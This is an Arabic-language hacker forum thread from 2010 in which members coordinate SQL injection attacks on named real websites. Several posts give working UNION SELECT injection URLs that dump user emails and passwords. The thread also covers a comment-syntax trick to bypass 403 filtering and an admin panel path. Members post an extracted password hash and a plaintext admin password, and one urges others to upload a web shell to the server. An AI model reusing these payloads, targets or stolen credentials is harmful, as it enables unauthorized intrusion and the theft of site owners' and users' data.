:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   العدد (3) من غرفة الحقن (http://www.vbspiders.com/vb/t39268.html)

aircrack -ng 12-14-2010 09:34 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة Victors (المشاركة 267973)
الحقنة

كود:

http://www.thecompletepianist.com/material.php?id=-18 UNION SELECT 1,2,group_concat(email,char(58),password),4,5,6,7,8 from users --
الايميل ~> لانة يتم الدخول عن طريق الايميل والباسوورد :)

اهلا بالزعيم
تسلم عمو
ع فكرة فيه موقع حقنته وهو موقع دعارة وافلام استغفر الله
راسلني على الخاص

aircrack -ng 12-14-2010 09:53 PM

اوكي شباب راح اعطيكم الموقع

لاتضحكو علي سويت عليه شرح ونسيته اني حقنت موقع وهلا فتحت الدوكمو لقيته هههههههههههههههه

http://www.avmaniacs.com/review.php?id=1472

مسار اللوحة وبروك عليكم الاختراق مسبقا

http://www.avmaniacs.com/admin/admin-add.php

aircrack -ng 12-14-2010 10:21 PM

ارفعو عليه شل لانو فيه مواقع حلوة على نفس السيرفر
في انتظاركم

aircrack -ng 12-14-2010 10:53 PM

وينكم شباب والله اشتقتلكم
شوفو مع الموقع وادعسوه ولي رجعة باذن الله بمواقع اخرى مع لوحات تحكم عن قريب
اخوكم عبد الصمد

Dr.Unkn0wn 12-14-2010 11:00 PM

كيف اتخطى خطا 403

aircrack -ng 12-14-2010 11:17 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة MR.DZ (المشاركة 268021)
كيف اتخطى خطا 403

ممممممممممممممممممممممممم واش راح نقولك خو
تخطي الفوربدن ب
كود:

/*!
و
*/

لما تنزل الحقنة منك او من الاعضاء راح اشرحلك بالتفصيل الممل عن تخطي الفوربدن
اصبر علي شوي اخي

Dr.Unkn0wn 12-14-2010 11:49 PM

هذا ما وصلت له للاسف و من يقدر يحمل الدرس السابع لفولكانو و يعيد يرفعه لي اكون ممنون له و الذي لديه برنامج تخمينات يحطه جزاه الله خير
حقني لحد تعلمي
http://www.avmaniacs.com/review.php?...23,24,25,26,27 --

إسلام العالم 12-15-2010 12:01 AM

اليوزر : 1

الباس (مشفر MD5 ) :
82b1530be6c3a060294116bbb6b1c3e4
و ما قدرت فكه...

aircrack -ng 12-15-2010 12:02 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة MR.DZ (المشاركة 268046)
هذا ما وصلت له للاسف و من يقدر يحمل الدرس السابع لفولكانو و يعيد يرفعه لي اكون ممنون له و الذي لديه برنامج تخمينات يحطه جزاه الله خير
حقني لحد تعلمي
http://www.avmaniacs.com/review.php?...23,24,25,26,27 --

مبدع اخي بس لاتنسى انو الموقع هذا لازم تح -- الناقصين
تفضل حبيبي
كود:


http://www.avmaniacs.com/review.php?id=-1472+UNION+/*!SELECT*/+version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

كمل الحقنة اخي

aircrack -ng 12-15-2010 12:07 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 268053)
اليوزر : 1

الباس (مشفر MD5 ) :
82b1530be6c3a060294116bbb6b1c3e4
و ما قدرت فكه...

تسلم اخي حقنة كاملة
الاميل +رقم اعضوية+الباس

يعطيك العافية اخي واصل

إسلام العالم 12-15-2010 12:47 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة عبد الصمد (المشاركة 267988)
اوكي شباب راح اعطيكم الموقع

لاتضحكو علي سويت عليه شرح ونسيته اني حقنت موقع وهلا فتحت الدوكمو لقيته هههههههههههههههه

http://www.avmaniacs.com/review.php?id=1472

مسار اللوحة وبروك عليكم الاختراق مسبقا

http://www.avmaniacs.com/admin/admin-add.php


هل جربت الموقع قبل؟؟؟؟لأني فليته تقلاية و هذه النتيجة :

الحقنة هكذا :

اقتباس:

http://www.avmaniacs.com/review.php?...re+column_name +like+char(37, 112, 97, 115, 115, 37)--

الجداول :
password>avmaniac_access2l>AdminAccounts

AdminAccountsID>avmaniac_access2l>AdminAccounts

االيوزر : 1

الباس : waltde51gn

حاولت الدخول للوحة ولكن لم يدخل أظن أن الباس مشفر....

darkman.dz 12-15-2010 01:06 AM

السلام عليكم ورحمة الله تعالى وبركاته
كيف الحال شباب

aircrack -ng 12-15-2010 01:07 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة إسلام العالم (المشاركة 268084)

هل جربت الموقع قبل؟؟؟؟لأني فليته تقلاية و هذه النتيجة :

الحقنة هكذا :



الجداول :
password>avmaniac_access2l>AdminAccounts

AdminAccountsID>avmaniac_access2l>AdminAccounts

االيوزر : 1

الباس : waltde51gn

حاولت الدخول للوحة ولكن لم يدخل أظن أن الباس مشفر....

شوف اخي
id هي رقم العضوية مش هي اليوزر
شوف اخي نفرض مثلا اننا حقنا موقع وطلع معانا اليوزر
مثلا راح نلقى
user:id:system
هنا id هي لمعرفة رقم العضوية ودائما رقم العضوية يكون 1
مثلا نفرض اننا بدنا جدول اليوزر الي راح يطلعلنا اسم الادمن
راح نلقى مثلا
user:username:sest
هنا username هي الي راح طلعلنا اسم الادمن
مثلا احنا طلعو معانا كذا
user:id:sese
user:username:ses
user:password:sese

ومثلا احنا حطينا حقنة وطلو معانا اعضاء كثير كيف راح نعرف الادمن فيهم هنا لازم نستعمل id
راح يكون الاستغلال كذا

concat(username,0x3a,id,0x3a,password)5,6,7+from+u ser
هنا
username راح يطلعلنا الاسماء
id راح يطلعلنا رقم العضويات
password راح يطلعلنا باسوردات

يعني يوزر وباس الادمن دائما نلاقيهم هيك مثلا
admin:1:123456
اتمنى تكون وصلت الفكرة
اخوك عبد الصمد

aircrack -ng 12-15-2010 01:19 AM

ع فكرة اخي اسلام
الباس مش مشفر وانا حقنته ودخلت اللوحة وتجولت فيها وعملت عليها شرح
اخي دائما لما نحب نطلع الادمن نستعمل مثل مافهمتك
مثلا هيك
admin:1:123456
فهمت علي اخي
انت تحقن جيدا واصل اخي
لك مني اجمل تحية

aircrack -ng 12-15-2010 01:23 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة _darkman_ (المشاركة 268104)
السلام عليكم ورحمة الله تعالى وبركاته
كيف الحال شباب

هلا مشرفنا الغالي منور الغرفة


الساعة الآن 04:49 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0